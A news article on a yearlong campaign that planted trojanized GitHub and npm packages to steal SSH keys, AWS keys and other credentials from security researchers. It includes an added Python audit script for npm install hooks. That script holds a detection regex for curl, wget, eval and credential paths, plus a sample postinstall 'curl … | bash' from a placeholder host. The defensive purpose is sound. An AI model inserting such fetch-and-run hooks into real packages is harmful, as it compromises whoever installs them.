The year of the cyberattack is apparently not going to end quietly.
For example, a report Friday (Dec. 13) by Ars Technica deals with a yearlong attack that has been stealing login credentials from both “malicious and benevolent” security personnel by infecting them with Trojanized versions of open source GitHub and NPM software.
According to the report, this campaign has been reported by security firms Checkmarx and Datadog Security Labs, with hackers infecting the devices of researchers in the security and other technical fields.
The hackers have yet to be identified, the report added, though researchers at Datadog have dubbed them MUT-1244. (MUT is short for “mysterious unattributed threat.”)
These hackers, the report said, install a professionally developed backdoor that takes care to mask its presence. They’ve also used spear phishing campaigns aimed at thousands of researchers who publish papers on the arXiv platform.
According to the report, the hackers seem to have more than one goal. One is collecting SSH private keys, Amazon Web Services access keys, command histories, and other sensitive information from infected devices.
At the time Ars Technica published its report, dozens of machines were still infected, with one Dropbox account offering 390,000 credentials for WordPress websites taken by the hackers. The malware involved in the attacks also installs cryptomining software that was found on at least 68 machines as of last month, the report said.
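Trojanized npm packages commonly get their first execution through npm lifecycle hooks (`preinstall`, `install`, `postinstall`, `prepare`), which run automatically during `npm install`. The report above does not describe MUT-1244's exact install mechanism, so this is a general defender's check rather than a reconstruction of that campaign. The script below is an added example, not code from the Ars Technica, Checkmarx or Datadog reports: it walks a `node_modules` tree, lists every package that declares a lifecycle script, and flags commands matching a small heuristic (remote downloads, encoded payloads, references to SSH, AWS or shell-history files, the same kinds of data the article says were collected). The three sample packages and the `example.invalid` URL are constructed for the demonstration.

```python
"""Audit a node_modules tree for npm lifecycle install scripts.

Added example for illustration; not code from the reports cited on
this page. The sample package tree is constructed below.
"""
import json
import re
import tempfile
from pathlib import Path

# npm runs these hooks automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic: strings that often appear in malicious install scripts.
# A hit means "read this script by hand", not proof of compromise.
SUSPICIOUS = re.compile(
    r"curl|wget|base64|node\s+-e|eval\(|\.ssh|\.aws|bash_history|zsh_history",
    re.IGNORECASE,
)


def audit_node_modules(root):
    """Return one dict per lifecycle script found under root/node_modules.

    Each dict carries the package name, hook name, the command, and a
    'suspicious' flag from the heuristic above.
    """
    findings = []
    for pkg_json in sorted(Path(root).rglob("package.json")):
        try:
            data = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (OSError, json.JSONDecodeError):
            continue  # unreadable or malformed manifest: skip, don't crash
        scripts = data.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            cmd = scripts.get(hook)
            if cmd:
                findings.append({
                    "package": data.get("name", pkg_json.parent.name),
                    "hook": hook,
                    "command": cmd,
                    "suspicious": bool(SUSPICIOUS.search(cmd)),
                })
    return findings


def build_sample_tree():
    """Create a constructed node_modules tree in a temp directory.

    Three packages: one with no scripts, one with a legitimate native
    build step, and one whose postinstall fetches and runs remote code
    (the shape a trojanized package often takes). Returns the root path.
    """
    root = Path(tempfile.mkdtemp())
    pkgs = {
        "left-pad-like": {"name": "left-pad-like", "version": "1.0.0"},
        "native-addon-like": {
            "name": "native-addon-like", "version": "2.1.0",
            "scripts": {"install": "node-gyp rebuild"},
        },
        "trojanized-like": {
            "name": "trojanized-like", "version": "0.0.1",
            "scripts": {"postinstall": "curl -s http://example.invalid/x | bash"},
        },
    }
    for dirname, data in pkgs.items():
        pkg_dir = root / "node_modules" / dirname
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(data), encoding="utf-8")
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for finding in audit_node_modules(sample_root):
        label = "SUSPICIOUS" if finding["suspicious"] else "review"
        print(f"[{label}] {finding['package']} {finding['hook']}: {finding['command']}")
```

Run it against a real project by calling `audit_node_modules("/path/to/project")` instead of the sample tree. Packages with a legitimate `install` step (native addons built with node-gyp, for instance) will appear in the output too; the point is to make every auto-executing script visible so it can be reviewed before the dependency is trusted, and to pair that review with `npm install --ignore-scripts` on untrusted code.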
These attacks are part of a wave of similar incidents at companies in a range of different sectors this year. For example, PYMNTS wrote last week about a ransomware attack on Cleo’s LexiCom, VLTransfer and Harmony enterprise file transfer tools, underscoring the urgent need to secure important business infrastructure that handles sensitive data.
“Critical business infrastructure, especially the many elements of it exposed to the internet, are attractive targets for attackers,” that report said. “That makes prevention and a multifaceted defense critical. By understanding the vulnerabilities of enterprise software tools and implementing security measures, businesses protect their data and mitigate the risks associated with data breaches.”
Several factors were at work in the Cleo incident. For one, enterprise file transfer tools often have extensive permissions and access rights that span networks. Beyond that, these systems usually handle large volumes of sensitive data, making them prime targets for extortion attempts. And finally, many organizations depend on legacy file transfer infrastructure that may not get security updates on a regular basis.
The post Yearlong Cyberattack Targets Security Workers appeared first on PYMNTS.com.